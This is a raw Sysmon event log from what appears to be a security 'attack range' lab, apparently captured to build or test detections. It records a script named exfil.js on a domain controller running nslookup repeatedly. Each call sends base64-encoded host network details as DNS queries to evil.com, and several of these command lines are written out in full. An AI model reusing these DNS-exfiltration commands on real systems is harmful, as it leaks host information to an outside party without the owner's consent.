CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NjogZmU4MDo6ZmMwMzpjOWUyOmIwNjg6OWY3MQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlezym.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 22542200x8000000000000000198390Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.233{00000000-0000-0000-0000-000000000000}6076evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000198389Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.128{00000000-0000-0000-0000-000000000000}5108evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000198388Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.045{00000000-0000-0000-0000-000000000000}6932evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000198387Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.947{00000000-0000-0000-0000-000000000000}420evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000198386Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.818{00000000-0000-0000-0000-000000000000}6028evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000198385Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.708{00000000-0000-0000-0000-000000000000}4592evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000198384Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.570{00000000-0000-0000-0000-000000000000}6488evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000198383Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.454{00000000-0000-0000-0000-000000000000}7836evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000198382Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.311{00000000-0000-0000-0000-000000000000}7704evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000198381Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.161{00000000-0000-0000-0000-000000000000}8evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000198380Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.979{00000000-0000-0000-0000-000000000000}8064evil.com0::ffff:127.0.0.1;<unknown process> 23542300x8000000000000000198379Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.692{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlgcjt.tmpMD5=E9933BFC1563034EF92711FFD1FA59E4,SHA256=B289486696E542D49274648AF69BCDC051FA9206A6157EC32F57F8442A56EBEC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000198378Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.661{2E1864BB-17B8-629A-9D3F-000000005F02}47767060C:\Windows\system32\conhost.exe{2E1864BB-17B8-629A-9E3F-000000005F02}7628C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198377Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.661{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198376Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.661{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198375Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.661{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198374Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.661{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198373Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.661{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B8-629A-9E3F-000000005F02}7628C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198372Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.661{2E1864BB-17B8-629A-9C3F-000000005F02}4363588C:\Windows\system32\cmd.exe{2E1864BB-17B8-629A-9E3F-000000005F02}7628C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198371Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.661{2E1864BB-17B8-629A-9E3F-000000005F02}7628C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A SVB2NDogMTAuMC4xLjE0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B8-629A-9C3F-000000005F02}436C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NDogMTAuMC4xLjE0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgcjt.tmp 2>&1 10341000x8000000000000000198370Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.629{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B8-629A-9D3F-000000005F02}4776C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198369Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.629{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B8-629A-9D3F-000000005F02}4776C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198368Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.629{2E1864BB-17B8-629A-9D3F-000000005F02}47767060C:\Windows\system32\conhost.exe{2E1864BB-17B8-629A-9C3F-000000005F02}436C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198367Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.614{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B8-629A-9D3F-000000005F02}4776C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198366Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.614{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198365Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.614{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198364Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.614{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198363Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.614{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198362Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.614{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B8-629A-9C3F-000000005F02}436C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198361Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.614{2E1864BB-17A1-629A-783D-000000005F02}55524728C:\Windows\System32\WScript.exe{2E1864BB-17B8-629A-9C3F-000000005F02}436C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198360Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.619{2E1864BB-17B8-629A-9C3F-000000005F02}436C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NDogMTAuMC4xLjE0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgcjt.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000198359Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.598{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlbzr.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000198358Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.577{2E1864BB-17B8-629A-9A3F-000000005F02}29325588C:\Windows\system32\conhost.exe{2E1864BB-17B8-629A-9B3F-000000005F02}8132C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198357Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.561{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198356Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.561{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198355Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.561{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198354Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.561{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198353Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.561{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B8-629A-9B3F-000000005F02}8132C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198352Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.561{2E1864BB-17B8-629A-993F-000000005F02}76567308C:\Windows\system32\cmd.exe{2E1864BB-17B8-629A-9B3F-000000005F02}8132C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198351Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.575{2E1864BB-17B8-629A-9B3F-000000005F02}8132C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A 